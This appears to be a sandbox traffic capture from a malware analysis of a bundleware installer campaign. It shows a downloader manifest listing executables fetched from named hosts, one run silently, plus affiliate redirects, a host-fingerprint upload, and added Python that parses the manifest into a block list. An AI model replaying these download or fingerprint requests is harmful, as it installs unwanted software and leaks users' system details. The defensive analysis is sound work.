GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*.-=.E@.H<.A)..@.IC.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}..o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C...H.KL.P..................[._&. ...........................|.~......(.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m.........I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8(.,A.K......C.I%.*..2?.Hgug).1E.Kn.o@.I-.4E.I>.F=.D6.;...'.)*.(*./-.-?.=-..:.C../<.C...5.<=.B?.C...9.@9.A:.A,.2;.B;.BQ.\...O.Tkyl/.3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|.........hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E411B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 29603
Connection: keep-alive
Date: Thu, 28 Jan 2016 09:25:55 GMT
Content-Disposition: attachment; filename="dm_left_image.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "27e01b52fcb3f43ff9d3f29b0af69137"
Accept-Ranges: bytes
Server: AmazonS3
Age: 30684
X-Cache: Hit from cloudfront
Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Zg60Q_S9Hj8UWsZktBjlMYau3ccBBqzn34I_x6L9vxVr29ZA5Bzxxw==
.PNG........IHDR.......e.....5Z......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A22384F4BB6C11E488CDA27B4BADD3EB" xmpMM:DocumentID="xmp.did:A22384F5BB6C11E488CDA27B4BADD3EB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A22384F2BB6C11E488CDA27B4BADD3EB" stRef:documentID="xmp.did:A22384F3BB6C11E488CDA27B4BADD3EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.O.8..p.IDATx...[..X.....I..12#.*..{z.f5.y[....4..$..>.....X..#m.vU.LWfUf......u......`.#3"....H.x.....o.......i.$...@.........~.Z..xd...w..,....;9......<..-...B.......o.....7._..w.Y....kn?>...T=..|:..^k.;......".J..B.gM.f).|...<..rK....=.7..Z.g....SDG..`.tm.q......ZS...(.V.<....Y.....;z.,?>..|*...k..}ip..C..=..|B...kV-W.....J....X....k...y>.[z.5.d.l..W.u.1/.....|...r.v.r}..|*...k...........j<.....p|Q=........$.....C...<..-....{.`......._.?x......q.7S>.......W...'_...#..#.p..a.Gy.O...sM!........S...3^.p.s.|!........r....@......vM|s3.......?..Bi.&....k._..........
<<< skipped >>>
GET /launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7 HTTP/1.0
Host: 46.21.100.248
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 12 May 2016 21:58:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 630
Connection: close
Content-Type: text/html; charset=UTF-8
files=3.t1=dl.u1=hXXp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.m1=0.d1=0.t2=dl.u2=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png.n2=Setup__2140_il65.exe.m2=0.d2=0.t3=dl.u3=hXXp://sub.spirlymo.com/installers/cli/1463083280319/SevenZip_downloader-Qa3a1oW9v.exe.n3=SevenZip_downloader-Qa3a1oW9v.exe.m3=1.d3=1500.....
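The 630-byte body above is the download manifest that the NSIS stub (User-Agent NSISDL/1.2) fetches from 46.21.100.248 before it drops cpSetup.exe and Setup__2140_il65.exe. The report prints every non-printable byte as a dot, so the line breaks between fields look exactly like the dots inside host and file names. The Python below is an added example, not part of the report or of the installer: it splits the dotted dump on the keys the manifest actually uses (files, then t/u/n/m/d with an index), undoes the report's hXXp/VVV defanging, and lists every host the downloader would contact, including the one nested in the appsetupurl parameter of the second entry. The meaning of the m and d fields is not documented anywhere in the capture and they are carried through verbatim.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the launch_v2.php response body shown above. The report
# renders each non-printable byte (the line break between fields) as '.',
# which is why the parser keys on "<dot><known key>=" instead of newlines.
MANIFEST_DUMP = (
    "files=3.t1=dl.u1=hXXp://get.wenter3.space/?affId=1006&appTitle=Installation"
    "&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe"
    ".m1=0.d1=0.t2=dl.u2=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26"
    "&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am"
    "&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S"
    "&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png"
    ".n2=Setup__2140_il65.exe.m2=0.d2=0.t3=dl.u3=hXXp://sub.spirlymo.com/installers"
    "/cli/1463083280319/SevenZip_downloader-Qa3a1oW9v.exe"
    ".n3=SevenZip_downloader-Qa3a1oW9v.exe.m3=1.d3=1500....."
)

# A field starts at the beginning of the dump or right after a rendered line
# break ('.'); its key is "files" or one of t/u/n/m/d followed by an index.
FIELD_RE = re.compile(r"(?:^|\.)(files|[tunmd]\d+)=")


@dataclass
class DownloadEntry:
    index: int
    kind: str   # t<N>, "dl" for every entry in this capture
    url: str    # u<N>, refanged
    name: str   # n<N>, the file name written to %Temp%
    m: str      # m<N> and d<N> are kept verbatim: the capture does not
    d: str      # say what they mean


def refang(url: str) -> str:
    """Undo the report's defanging (hXXp, VVV) so urllib can parse the URL."""
    if url.startswith("hXXp"):
        url = "http" + url[4:]
    return re.sub(r"://VVV\.", "://www.", url, count=1)


def split_fields(dump: str) -> dict:
    """Cut the dotted dump into key -> raw value without touching the dots
    that belong to host names and file names."""
    fields = {}
    marks = list(FIELD_RE.finditer(dump))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(dump)
        # only the tail of the dump carries trailing rendered bytes
        fields[m.group(1)] = dump[m.end():end].rstrip(".")
    return fields


def parse_manifest(dump: str) -> list:
    fields = split_fields(dump)
    return [
        DownloadEntry(
            index=i,
            kind=fields[f"t{i}"],
            url=refang(fields[f"u{i}"]),
            name=fields[f"n{i}"],
            m=fields[f"m{i}"],
            d=fields[f"d{i}"],
        )
        for i in range(1, int(fields["files"]) + 1)
    ]


def manifest_hosts(entries: list) -> list:
    """Every host the downloader will contact, including the host named in a
    nested appsetupurl= parameter (the second entry hands one to download.php)."""
    hosts = set()
    for e in entries:
        parts = urlsplit(e.url)
        hosts.add(parts.hostname)
        for nested in parse_qs(parts.query).get("appsetupurl", []):
            hosts.add(urlsplit(nested).hostname)
    return sorted(hosts)


if __name__ == "__main__":
    entries = parse_manifest(MANIFEST_DUMP)
    for e in entries:
        print(f"{e.index}: {e.name} <- {e.url}")
    print(manifest_hosts(entries))
```

The three file names match the files the report lists as created in %Temp% and the later download.php exchange (Content-Disposition: Setup__2140_il65.exe), so the manifest is the plan and the rest of the capture is its execution; the host list is what goes into a block rule.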
GET hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.freeo9.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 77864
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 12 May 2016 21:58:15 GMT
X-Cache: Miss from cloudfront
Via: 1.1 55ee6ea70e0823309f10db2e4b8f119f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: dFWWzMDaXm9o2cUYSzXKfcmt70Hq9SrANsufsglhTiIZRG8X1QGlyA==
;.7A..0.....{.HU.T/`...{.1xw.>0...O&..}..tJt...".3.E...FY.....db.zrL.J.{E5..............>.n.R........H`...........$..;.L...c$A.<.c.j.k....E...a...V._.a)V.0.<)....L.B.C.5..r/..SY......}Q. s-D.2...c..wR.N. ...ve7Z.a...#....'.........x.......-.m.9.9..t-..{..1c.5|...esB?.c.^lyh.....0.2Ab..._...$p..3....U..=5...&.8)..........Y.....CK....n.............4....&....$........F.m.Ns:en#..8(..'........[..a..=......3N../.*d.D:1.=..8K.......9..3......51..E[..$....W..2.[^ZV. `....'..E.X.*.=.H...Z.}....3. "s.Y...?....x.A....,...!.._..32.BiF....i.x.........g9.....$.D.{.."Q.X8.....0...{......F."...o.L......R..e!v.....~......^.-.....(er.D..8...U.#...w.hj.I<;.2....5.._b...O....|.@ .........7>.Q.........AX...9....V...a..P.k.#........Yb..;~|d.....:......H..R6.T..\...X.:.gO.=3...._\.E.n........Xp.I.....u.6..q.m.......N..!..R...w...eT.e....'..c...k.x..'!..[f....t..I..Xk?......:rg..|k.D........^..;x9}.9.CF.i..D6...@-C.....c.@/.........%l(.1..&O.).y..D..I`....c...|%.L.T./J.......U.7d.|...70.}......u(F...Y..Z.. X...u...;..Y...b.7{.F^c>tP5....)..G..;...s..OB...S...)..q/t..p `"l.~..jU.j.....p...#...;..o..,.s"......g.Yw.6Xk2g}..G.X7..x.2.....?.'.K....;.A..9.......4.Jl....p"..,..S...F.I....i.*.>.N..h.~a....0.....XD..[)'D o. C#t.i..=.u.vk...'.....2.y....A.@..b{o...4BkW.<.@.X}Nt......*...i........~..........H6z/........2F.*...>.w..l..^..;.,k.......`M(.X./....~.......\.a_..%..S...S..J.......'G..n...zC.fV{.R...F.....B(TVn..-.,.=....`...S_..l'.K.U4)......F~....v.@.r8J.V.d...l.=..z..R`...X ~.1...KN.ox.....J$..k......b.
<<< skipped >>>
GET /V35/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69943
Connection: keep-alive
Date: Sat, 12 Mar 2016 06:56:00 GMT
Last-Modified: Sun, 28 Feb 2016 13:30:41 GMT
ETag: "76a09d03456de6b830f2d57dae56f423"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 25042
X-Cache: Hit from cloudfront
Via: 1.1 02559733574bc91699d28e7c3b1df3ea.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TBECHG2c6pKJlssRDmoZh4_yi0QFndUd1uwc4WmuMo8wAwEbV03m6g==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();.var g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = [];..var g_disable_updater = false;..//in the version we tests updater task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterTaskCreated = false;..function LogMessage(message) {. try {. g_ami.Log(message);. }. catch (excpt) {. }.}..function IsDeclined(name) {. var declined = 0;. for (var i = 0; i < g_removedComps.length; i ) {. if (g_removedComps[i] == name) {. declined = 1;. break;. }. }. return declined;.}..function UpdateSkipStatus(sn) {. if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {. g_ami.WriteProfileString(g_testf, '', sn, 'S');. g_reportedComps.push(sn);. }. }.}..function ShortNameFromName(name) {. for (c = 0; c < g_comps.length; c ) {. if (g_comps[c].name == name) {. return g_comps[c].sn;. }. }. return name;.}..function UpdateComponentsStatus() {. LogMessage('UpdateComponentsStatus function started');. for (var j = 0; j < g_possibleComps.length; j ) {.. if (g_possibleComps[j].sn =
<<< skipped >>>
POST hXXp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.freeo9.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
cid=707569c4c57c87d53171d83f71777ffd&uac=1
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 12 May 2016 21:58:38 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 6fd049110ebc3ac6deddab8b0bf5d686.cloudfront.net (CloudFront)
X-Amz-Cf-Id: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..
GET hXXp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.freeo9.space
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 590
Connection: close
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 12 May 2016 21:58:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 0991a4b934302d120a32dada6513dc35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: JWYNAkiuILpXQ1Kk2y1g9KTG0tNfq-9NJtzHOy55PKMELqgR_y9j0Q==
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer%26uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a></body>..
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il65.exe"
Content-Type: application/x-msdownload
Date: Thu, 12 May 2016 21:58:41 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2016 21:58:41 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il65.exe
Content-Length: 784080
Connection: Close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|i:...i...i...im..i...im..i...im..i...i...i...i.e.i...i.e.i...i...i...i...i...i...i...i...i...i...i...iRich...i................PE..L.....4W.................h...r.......t............@..........................0.......y....@..................................G..(........@.......................$...................................2..@...............<............................text....f.......h.................. ..`.rdata...............l..............@..@.data....7...P.......<..............@....rsrc....@.......B...T..............@..@.reloc...G.......H..................@..B..................................................................................................................................................................................................................................................................................................................................................................vC............................U...E.].........................................................VW..W..j.V..|.......>_^.........U...E....E..A...]...............U...Q.V.u...........^]..........U...U..M..........3......]......U..Q.E.V.p....0.u........^Y]....U...u..E.....t..u........]...2.]................U..Q.E.V.p....0.u........^Y]....U..Q.u..$.....t..u....u......Y]...2.Y]..........V...h.....^.....V...(.....^.....3..........u....w.....&.........j.j.j.h........B.......
<<< skipped >>>
POST hXXp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: set.downor3.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
cid=707569c4c57c87d53171d83f71777ffd&uac=1
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 12 May 2016 21:58:16 GMT
Connection: close
Content-Length: 428584
...no)9.VB.!.A0....z6.Y...4..S.W..Q2....d.P.f.<.......2.....#.....4..).wHh./P.<\4_..../C.?..P.....D..o....}..VO............%.#X..=q..N.c..N.}...pI..H.y.hz!v.R..g..D..V.q.~..Evq.......k..Y....v.....*]......q..t........<D12=..<.C5..Li].5.=I....oj..)..M&..........G..d.....b...Y39....!P..?..V..WP.NNG...'..vD...gi....k........1.`.L.[...eQ.g."."".......w.....E9..$..F.Di.....C...Nj.&..U..n......u# ..y...~..rLX....#.FKg..N..|.... 8.vKs...3....-.C..DYW.1G.}bdOV...T..R%....MzO....`....!?...._E.Z.^7..!...(.Q'z'..1.`..%.....f...49..|.IB4..K.Vz...Gs.Cd.]....Wm3!..i.K......\.....}).......,.:.5Wt....I...^4.....O..E"...A.#.|fp.^.(}....|0....0.!k.E...E.o..L.Y..9....'h4....6...p0....S....{.w{.K..v..8Z....L......'R....P.'.1.&..e.sY^.d..^F>(3...BXG..U...)s{..H...<A..~........0c.2..L.gd...h.....a....8)'..........d....[.......].....]....z..C.D...?.z^..$..$..z.5..<.. .Yq.~/..g...o..*.5'&....f....,c...k..... ....wA....L.k.......:...HK$]..9....*"..$,.}...An....-........&.....O@...q(...}.".Ds9s..2.....D..d#...y...o....-..K..~n.oW%..}C.\4.'tH.@!....k.....>....B;3y.v..e},w6.......G.n......t...j^.90..6......H>Q..@..S.DD.%.o.(.zz.V..../r.a..Q....!5P 8..'...I .I...%.*..AB...#Q.QPH....JP.E.q]$..4.08...4..XN...s..U...C.........'.....b'....:H....K..&.-A&.{......B..L..P..R./.3p...........'.5..UU.F........=.Mv...98...S):...|7... jG.j.c.{o...&.A.....W..4.]......q!m..tw..rx../..1..6).D.2#c..zN.!....q..cz./......f;....]...........k....q.....[.(<..<.a .<H..s...UHx!B./.$..A..hM.|..I...$....E@..z.3..>._...o.e...U.
<<< skipped >>>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2016 21:58:37 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02024-102524c8b7d471e3251121f5c3cd0e-1006-4-0-0-0-0-UA-0-3131-313435-343338353236-30-30-30-194.242.96.218-20160512175837-_-1D1F4F24103E253220292314513A1B00655F6F0B4F131541634A1F5117051454457459536E2E2C1807; expires=Sat, 11 Jun 2016 21:58:37 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sun, 07 Apr 2019 08:38:37 GMT; path=/;
tracking_id: 102524c8b7d471e3251121f5c3cd0e
X-Robots-Tag: noindex, nofollow
Content-Length: 445
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>.</p>.</body></html>...
<<< skipped >>>
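The aff_c request above is the middle hop of a three-step affiliate redirect: up.freeo9.space/h_redir.php answers 302 to capital.go2cloud.org/aff_c, which fills the {aff_id}, {transaction_id} and {country_code} macros in the url= parameter and 302s back to up.freeo9.space/offer.php, the request the InstallCapital client then makes. The Python below is an added example, not code from the report or from any of these sites. It recovers the macro values by pairing the template with the final Location, decodes the hex-encoded fields of the enc_aff_session_4 cookie (which position corresponds to which request parameter is inferred from matching values, nothing in the capture documents it), and decodes the base64 ho_mob cookie. The constants are copied from the exchange above.

```python
import base64
import json
from urllib.parse import parse_qsl, urlsplit

# Constructed from the h_redir.php / aff_c exchange above: the macro template
# that up.freeo9.space passed in its url= parameter, and the Location that
# capital.go2cloud.org answered with once it had filled the macros in.
TEMPLATE_URL = (
    "http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11"
    "&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3"
    "&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1"
)
FINAL_URL = (
    "http://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11"
    "&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3"
    "&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1"
)
# The two Set-Cookie values from the same 302 response.
ENC_AFF_SESSION = (
    "ENC02024-102524c8b7d471e3251121f5c3cd0e-1006-4-0-0-0-0-UA-0-3131-313435"
    "-343338353236-30-30-30-194.242.96.218-20160512175837-_-"
    "1D1F4F24103E253220292314513A1B00655F6F0B4F131541634A1F5117051454457459536E2E2C1807"
)
HO_MOB = (
    "eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25u"
    "ZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0="
)


def resolve_macros(template: str, final: str) -> dict:
    """Pair the template's query with the resolved one and read off what the
    tracking server substituted for each {macro}."""
    templ = parse_qsl(urlsplit(template).query, keep_blank_values=True)
    resolved_q = dict(parse_qsl(urlsplit(final).query, keep_blank_values=True))
    resolved = {}
    for key, value in templ:
        if value.startswith("{") and value.endswith("}"):
            resolved[value[1:-1]] = resolved_q.get(key)
    return resolved


def printable_hex_fields(cookie: str) -> list:
    """Split the session cookie on '-' and ASCII-decode every field that is
    even-length hex and decodes to printable text. Assumption: the decoded
    values 11 / 145 / 438526 are source, aff_sub and aff_sub2 from the
    aff_c request; the capture does not label the positions."""
    out = []
    for raw in cookie.split("-"):
        if len(raw) < 2 or len(raw) % 2:
            continue
        try:
            data = bytes.fromhex(raw)
        except ValueError:
            continue
        if all(0x20 <= b <= 0x7E for b in data):
            out.append((raw, data.decode("ascii")))
    return out


def decode_ho_mob(cookie: str) -> dict:
    """ho_mob is plain base64 around a JSON object."""
    return json.loads(base64.b64decode(cookie))


if __name__ == "__main__":
    print(resolve_macros(TEMPLATE_URL, FINAL_URL))
    print(printable_hex_fields(ENC_AFF_SESSION))
    print(decode_ho_mob(HO_MOB))
```

The cookie also carries the sandbox's egress address (194.242.96.218) and a timestamp of 17:58:37 against a Date header of 21:58:37 GMT, so the tracking server stamps in a UTC-4 local time. The affiliate values 1006, 145 and 438526 are the same affId, pid/s1 and tid/s2 that appear in the launch_v2.php request and the cpSetup download URL earlier in the capture, which is what ties the download hosts and the offer hosts to one campaign.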
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 430
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=C8318CA6891F5119A9FD96EC19E98D71&Sysid1=C8318CA6891F5119A9FD96EC19E98D71&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il65.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il65&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA3AA==&netfs=3&ts=1463090333&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2016 21:58:46 GMT
Server: Apache/2.2.15 (Red Hat)
